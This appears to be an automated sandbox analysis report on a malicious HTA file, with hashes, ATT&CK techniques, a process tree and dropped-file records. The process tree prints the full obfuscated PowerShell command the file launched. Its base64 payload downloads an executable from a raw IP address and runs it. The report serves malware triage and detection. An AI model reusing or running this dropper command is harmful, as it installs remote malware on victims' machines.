4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4

General

Target

niceidea.hta
Size

154KB
MD5

586dc2855cbce16da2db1a5840694321
SHA1

aa92aefd6a9f95dc8e38f4d3b406cf506df9335b
SHA256

4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4
SHA512

53685b59faf9cff6d5cc4d07d7cda09e384a412ce79c5fb11fd48d815005cc60bf56d944a0fde3c1c274e5565f2ff4385db6e2fa1461a3e7b8f0e446d4558779
SSDEEP

96:4owZw9d6yfaKPQEoXRUn+VO+ehLGOToQPU6ghhiXB3zn+/edxCUMIqh2SCw2QKSs:4LwSiolYyrk3DwQ

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
17	5048	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

Processes:

powershell.exe

pid	Process
5048	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.execmd.exepowershell.execsc.execvtres.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid	Process
5048	powershell.exe
5048	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	5048	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

mshta.execmd.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 2852 wrote to memory of 2072	2852	mshta.exe	85
PID 2852 wrote to memory of 2072	2852	mshta.exe	85
PID 2852 wrote to memory of 2072	2852	mshta.exe	85
PID 2072 wrote to memory of 5048	2072	cmd.exe	87
PID 2072 wrote to memory of 5048	2072	cmd.exe	87
PID 2072 wrote to memory of 5048	2072	cmd.exe	87
PID 5048 wrote to memory of 2872	5048	powershell.exe	88
PID 5048 wrote to memory of 2872	5048	powershell.exe	88
PID 5048 wrote to memory of 2872	5048	powershell.exe	88
PID 2872 wrote to memory of 4656	2872	csc.exe	91
PID 2872 wrote to memory of 4656	2872	csc.exe	91
PID 2872 wrote to memory of 4656	2872	csc.exe	91

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\niceidea.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5048
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\02mjmrga\02mjmrga.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2872
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC841.tmp" "c:\Users\Admin\AppData\Local\Temp\02mjmrga\CSC689A163782A54EAAB0AD5D857FACCE51.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\02mjmrga\02mjmrga.dll

Filesize
3KB

MD5
c5bb7f39d77db2322aef5c8a9066cf02

SHA1
61d8923ca73fdc412b4fd6f9c8d4d37d35ccba48

SHA256
e28347a15aa28a73f2bf0f32b1d0bc557867aa3dbe9f7b4d90e0ca167f5c8fb9

SHA512
2c4f70a90ef1f17ea1b7bc6585c75388b0eb703f10ce0f3c7a1ae6e5c4c4c44659c6053f7a89564767c16cbd3c76429d712a65bd13f9115711fe1ea2166cf006

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC841.tmp

Filesize
1KB

MD5
fc9c8cc9482cb432de715dbcc51d794f

SHA1
49405f8c7bc33eb0c0004dcd2710861f1b536f56

SHA256
881313c7975970b6941bc90c66b2b1b1333101fc93a4f6b5b54671d14f5dd899

SHA512
8f402130ba4dadb159be8746d96a86d361892e3d2d957a86062af0338b576284dad1f4d172fd5cad1dfe6312cc0f76d85e676650c94d8db18a2fc77595403bf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jy5gav1t.fzd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02mjmrga\02mjmrga.0.cs

Filesize
482B

MD5
fb855dde451137351eb67570a43b18f5

SHA1
3e66d1786f6644d488d7b8a97a3f429518199f5e

SHA256
ff934921644479cabd71a146f687a208c7924197a310f2bdd86fcea1dcb3570f

SHA512
40bd0be759b332b735af39b6c82e24d6b093cbca1d5bde975078cbd28ce0d2e3f8c03c0559a42b7f68d482487b3157719d963428359245aef11db4823a6691cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02mjmrga\02mjmrga.cmdline

Filesize
369B

MD5
f0826a45ffbbdcf4e0ca1830ab70bea5

SHA1
31a941f62dffc897c66b6b158382dd2bcd8eced3

SHA256
e0d916f565de44abe926eee483c44539d6bc5ba0a4150fcf69b7bb7e43bc7e70

SHA512
bf2e05a10a852f34023c67507f11949c2a4b445d92ee9376abe462288a2f8ee3f85e7f3e08214e49e6d27853c28aed0f10d53d0e680fb7b8743f98c7f4e42720

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\02mjmrga\CSC689A163782A54EAAB0AD5D857FACCE51.TMP

Filesize
652B

MD5
2c0ba007e7b3c0452081c1ee36800d3c

SHA1
938a117e2e769203f5867f0e588d8b0c7c52d9ff

SHA256
8057809b98a0ee76b17b24f4cf7822415dc56c048068d2322e5f909a6b9cae5c

SHA512
d045a40b5445b17e2c5f034ab7d2ee8562348f3f2f443ec8a8306370fa626ce7263d4cd96c743ce8140035d63aa8ef7467346704ddc7d1ddf75be8d60720232b

Download Submit
memory/5048-37-0x0000000070AF0000-0x00000000712A0000-memory.dmp

Filesize
7.7MB

Download
memory/5048-40-0x00000000078E0000-0x00000000078F1000-memory.dmp

Filesize
68KB

Download
memory/5048-16-0x0000000005E40000-0x0000000006194000-memory.dmp

Filesize
3.3MB

Download
memory/5048-17-0x0000000006390000-0x00000000063AE000-memory.dmp

Filesize
120KB

Download
memory/5048-18-0x0000000006440000-0x000000000648C000-memory.dmp

Filesize
304KB

Download
memory/5048-19-0x0000000007360000-0x0000000007392000-memory.dmp

Filesize
200KB

Download
memory/5048-21-0x0000000070AF0000-0x00000000712A0000-memory.dmp

Filesize
7.7MB

Download
memory/5048-20-0x000000006D3B0000-0x000000006D3FC000-memory.dmp

Filesize
304KB

Download
memory/5048-34-0x0000000007650000-0x00000000076F3000-memory.dmp

Filesize
652KB

Download
memory/5048-33-0x0000000070AF0000-0x00000000712A0000-memory.dmp

Filesize
7.7MB

Download
memory/5048-32-0x0000000006990000-0x00000000069AE000-memory.dmp

Filesize
120KB

Download
memory/5048-22-0x000000006D510000-0x000000006D864000-memory.dmp

Filesize
3.3MB

Download
memory/5048-0-0x0000000070AFE000-0x0000000070AFF000-memory.dmp

Filesize
4KB

Download
memory/5048-36-0x0000000007700000-0x000000000771A000-memory.dmp

Filesize
104KB

Download
memory/5048-35-0x0000000007D80000-0x00000000083FA000-memory.dmp

Filesize
6.5MB

Download
memory/5048-38-0x0000000007760000-0x000000000776A000-memory.dmp

Filesize
40KB

Download
memory/5048-39-0x0000000007980000-0x0000000007A16000-memory.dmp

Filesize
600KB

Download
memory/5048-5-0x0000000005AE0000-0x0000000005B46000-memory.dmp

Filesize
408KB

Download
memory/5048-41-0x0000000007910000-0x000000000791E000-memory.dmp

Filesize
56KB

Download
memory/5048-42-0x0000000007920000-0x0000000007934000-memory.dmp

Filesize
80KB

Download
memory/5048-43-0x0000000007960000-0x000000000797A000-memory.dmp

Filesize
104KB

Download
memory/5048-44-0x0000000007950000-0x0000000007958000-memory.dmp

Filesize
32KB

Download
memory/5048-6-0x0000000005B50000-0x0000000005BB6000-memory.dmp

Filesize
408KB

Download
memory/5048-4-0x00000000053D0000-0x00000000053F2000-memory.dmp

Filesize
136KB

Download
memory/5048-2-0x0000000070AF0000-0x00000000712A0000-memory.dmp

Filesize
7.7MB

Download
memory/5048-3-0x0000000005440000-0x0000000005A68000-memory.dmp

Filesize
6.2MB

Download
memory/5048-57-0x0000000007950000-0x0000000007958000-memory.dmp

Filesize
32KB

Download
memory/5048-1-0x0000000004DD0000-0x0000000004E06000-memory.dmp

Filesize
216KB

Download
memory/5048-59-0x0000000070AFE000-0x0000000070AFF000-memory.dmp

Filesize
4KB

Download
memory/5048-60-0x0000000070AF0000-0x00000000712A0000-memory.dmp

Filesize
7.7MB

Download
memory/5048-61-0x0000000007BF0000-0x0000000007C12000-memory.dmp

Filesize
136KB

Download
memory/5048-62-0x00000000089B0000-0x0000000008F54000-memory.dmp

Filesize
5.6MB

Download
memory/5048-65-0x0000000070AF0000-0x00000000712A0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads